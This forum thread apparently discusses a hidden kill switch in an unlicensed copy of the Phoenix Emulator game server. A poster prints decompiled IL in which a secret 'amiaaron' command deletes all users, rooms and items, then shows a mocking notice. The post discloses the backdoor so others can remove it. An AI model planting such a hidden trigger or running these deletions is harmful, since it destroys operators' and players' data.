@Nominal
This is the semi obuscated code that delete all users, rooms, and all items from your database.
as you can see the command 'amiaaron' go to L_153a that execute 3 mysql query on the database that empty the tables
"DELETE * FROM items;"
"DELETE * FROM users;"
"DELETE * FROM rooms;"
at the end, it print this:
"Important Notice from Hotel Management"
"Uh oh, this hotel is running an unlicenced version of Phoenix Emulator.. as a result I\'m afraid your database just vanished! :(\r\n- Try paying for a licence next time and this won\'t happen :)"
then... I have removed this danger.
Remember that I'm not a bullshit man... I joke, I smile, but I'm serious.
Code:
.......
L_25a0: newobj instance void [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::.ctor(int32)
L_25a5: dup
L_25a6: ldstr "commands"
L_25ab: ldc.i4.0
L_25ac: call instance void [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1)
L_25b1: dup
L_25b2: ldstr "proxylol"
L_25b7: ldc.i4.1
L_25b8: call instance void [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1)
L_25bd: dup
L_25be: ldstr "amiaaron"
L_25c3: ldc.i4.2
L_25c4: call instance void [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1)
L_25c9: dup
L_25ca: ldstr "info"
L_25cf: ldc.i4.3
L_25d0: call instance void [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1)
..........
L_2698: switch (L_256d, L_16f2, L_1621, L_1516, L_1516, L_1516, L_14ac, L_1236, L_1093, L_0ee4, L_07ee, L_07ee, L_0d20, L_07c0, L_073b, L_0061)
..........
L_153a: br L_167a
L_153f: nop
L_1540: call class Phoenix.Storage.x6afab36292a61282 Phoenix.xcf610c81231340bb::x2cea531af9388ee6()
L_1545: callvirt instance class Phoenix.Storage.xc133500a5775b79b Phoenix.Storage.x6afab36292a61282::x5cd51f3f5a321826()
L_154a: stloc.s xcabb
L_154c: nop
L_154d: ldloc.s xcabb
L_154f: ldstr "DELETE * FROM items;"
L_1554: callvirt instance void Phoenix.Storage.xc133500a5775b79b::xa266202b32508032(string)
L_1559: nop
L_155a: ldloc.s xcabb
L_155c: ldstr "DELETE * FROM users;"
L_1561: callvirt instance void Phoenix.Storage.xc133500a5775b79b::xa266202b32508032(string)
L_1566: nop
L_1567: ldloc.s xcabb
L_1569: ldstr "DELETE * FROM rooms;"
L_156e: callvirt instance void Phoenix.Storage.xc133500a5775b79b::xa266202b32508032(string)
L_1573: nop
L_1574: nop
L_1575: leave.s L_158f
L_1577: ldloc.s xcabb
L_1579: ldnull
L_157a: ceq
L_157c: stloc.s flag4
L_157e: br.s L_158a
L_1580: ldloc.s xcabb
L_1582: callvirt instance void [mscorlib]System.IDisposable::Dispose()
L_1587: nop
L_1588: br.s L_158e
L_158a: ldloc.s flag4
L_158c: brfalse.s L_1580
L_158e: endfinally
L_158f: nop
L_1590: ldc.i4.1
L_1591: stloc.s flag3
L_1593: leave L_6626
L_1598: br L_1675
L_159d: ldloc.s xadccad
L_159f: ldstr "Important Notice from Hotel Management"
L_15a4: callvirt instance void Phoenix.Messages.x89adc77c0a5647d3::xe878598d6a487b26(string)
L_15a9: nop
L_15aa: ldloc.s xadccad
L_15ac: ldstr "Uh oh, this hotel is running an unlicenced version of Phoenix Emulator.. as a result I\'m afraid your database just vanished! :(\r\n- Try paying for a licence next time and this won\'t happen :)"
@Habgo
try open the table 'server_status' and empty it. or put 0 in field 'stamp'
Are you sure to use the database on the archive?